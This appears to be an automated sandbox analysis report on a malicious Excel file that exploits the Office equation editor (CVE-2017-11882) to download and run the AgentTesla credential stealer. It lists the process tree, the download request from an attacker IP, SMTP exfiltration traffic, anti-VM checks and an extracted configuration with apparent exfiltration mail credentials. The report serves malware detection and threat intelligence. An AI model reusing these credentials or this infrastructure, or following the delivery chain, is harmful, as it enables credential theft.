Windows Analysis Report AGG POWER RFQ.xlsx

Overview

General Information

Sample Name: AGG POWER RFQ.xlsx
Analysis ID: 435321
MD5: b6d32254c5e3faa7fb26cccabddad2f4
SHA1: abf474e378247ebeb3300de929a50d0996286c01
SHA256: fca7f5cda93c9f473a6c3e9c3857d19d69c25835fd71b21d8b1354f78b102397
Tags: VelvetSweatshop, xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2596 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2392 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2908 cmdline: 'C:\Users\Public\vbc.exe' MD5: 42520170FE48AF70B3711BF86BDE77B0)
      • vbc.exe (PID: 1980 cmdline: C:\Users\Public\vbc.exe MD5: 42520170FE48AF70B3711BF86BDE77B0)
  • tnvLnx.exe (PID: 1664 cmdline: 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe' MD5: 42520170FE48AF70B3711BF86BDE77B0)
    • tnvLnx.exe (PID: 152 cmdline: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe MD5: 42520170FE48AF70B3711BF86BDE77B0)
  • tnvLnx.exe (PID: 764 cmdline: 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe' MD5: 42520170FE48AF70B3711BF86BDE77B0)
    • tnvLnx.exe (PID: 2564 cmdline: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe MD5: 42520170FE48AF70B3711BF86BDE77B0)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "sales5@alkhaleejautoparts.com]~%l3$ck*(U_mail.alkhaleejautoparts.comlisafury29@safina.cc"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.vbc.exe.3553848.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.vbc.exe.3553848.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
6.2.tnvLnx.exe.3553848.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
6.2.tnvLnx.exe.3553848.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
5.2.vbc.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 192.3.141.146, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2392, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2392, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2392, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2908
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2392, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2908

Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales5@alkhaleejautoparts.com]~%l3$ck*(U_mail.alkhaleejautoparts.comlisafury29@safina.cc"}
Multi AV Scanner detection for submitted file
Source: AGG POWER RFQ.xlsx; Virustotal: Detection: 27%
Source: AGG POWER RFQ.xlsx; ReversingLabs: Detection: 21%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: UInt32TypeInfo.pdb; source: tnvLnx.exe, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp
Source: excel.exe; Memory has grown: Private usage: 4MB later: 60MB
Source: global traffic; DNS query: name: mail.alkhaleejautoparts.com
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 192.3.141.146:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 148.66.138.106:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 148.66.138.106:587
Source: global traffic; TCP traffic: 192.168.2.22:49166 -> 148.66.138.106:587
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Wed, 16 Jun 2021 10:20:52 GMT; Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28; Last-Modified: Wed, 16 Jun 2021 05:38:46 GMT; ETag: "111a00-5c4db81175295"; Accept-Ranges: bytes; Content-Length: 1120768; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload; Data Raw: (raw response body omitted)
Source: Joe Sandbox View; IP Address: 148.66.138.106
Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS
Source: global traffic; TCP traffic: 192.168.2.22:49166 -> 148.66.138.106:587
Source: global traffic; HTTP traffic detected: GET /win/vbc.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 192.3.141.146; Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7AB3B46.emf
Source: global traffic; HTTP traffic detected: GET /win/vbc.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 192.3.141.146; Connection: Keep-Alive
Source: unknown; DNS traffic detected: queries for: mail.alkhaleejautoparts.com
Source: vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp; String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp; String found in binary or memory: http://DTHLcG.com
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp; String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2367250713.0000000002894000.00000004.00000001.sdmp; String found in binary or memory: http://gN3yhO7qZ2vk1Dl2x8.com
Source: vbc.exe, 00000005.00000002.2367334115.00000000028BB000.00000004.00000001.sdmp; String found in binary or memory: http://mail.alkhaleejautoparts.com
Source: vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2155151223.0000000002401000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221949010.0000000002401000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2367072067.00000000027C8000.00000004.00000001.sdmp; String found in binary or memory: https://api.ipify.org%
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp; String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: tnvLnx.exe; String found in binary or memory: https://github.com/georgw777/
Source: tnvLnx.exe; String found in binary or memory: https://github.com/georgw777/MediaManager
Source: vbc.exe, 00000004.00000000.2148405134.0000000000AD2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2366734790.0000000000AD2000.00000020.00020000.sdmp, tnvLnx.exe, 00000006.00000002.2221233725.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000007.00000000.2220311506.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp; String found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp; String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable Editing from the 15 h . ' yellow bar above ,, This document is a ' 3. Once you have enab
.NET source code contains very large array initializations
Source: 5.2.vbc.exe.400000.0.unpack, <PrivateImplementationDetails>{6F25B528-9522-4753-AD5D-2EB6462D9D13}/D22EEAA0-99FF-4867-B695-A5CAAFF01E6A.cs; Large array initialization: .cctor: array initializer size 11963
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe; Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_007102F8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_007162D8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00716F88
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00446350
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00445330
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00442099
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 7_2_00445678
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00379020
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037BB10
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037DBA0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037549A
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037FBB0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00372CC0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00374EA0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0037AEEF
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00711058
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00710048
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00715CE8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00715CD9
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007104D8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007104C8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00714C88
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00715540
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_0071490D
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007159F0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00714600
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007102F8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_007162D8
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 8_2_00716F88
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_00205330
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_00206350
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_00202099
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 9_2_00205678
Source: AGG POWER RFQ.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tnvLnx.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tnvLnx.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc[1].exe.2.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: vbc[1].exe.2.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.ad0000.2.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vbc.exe.ad0000.2.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.ad0000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.vbc.exe.ad0000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: tnvLnx.exe.5.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tnvLnx.exe.5.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.0.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@12/22@7/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$AGG POWER RFQ.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE7AF.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: AGG POWER RFQ.xlsx Virustotal: Detection: 27%
Source: AGG POWER RFQ.xlsx ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: AGG POWER RFQ.xlsx Static file information: File size 1376256 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: UInt32TypeInfo.pdb source: tnvLnx.exe, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp
Source: AGG POWER RFQ.xlsx Initial sample: OLE indicators vbamacros = False
Source: AGG POWER RFQ.xlsx Initial sample: OLE indicators encrypted = True
Source: C:\Users\Public\vbc.exe Code function: 4_2_00AD3BCE push es; ret
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B1122 push ecx; iretd
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B117B push edx; iretd
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B1144 push ecx; iretd
Source: C:\Users\Public\vbc.exe Code function: 4_2_02003232 push esp; retf
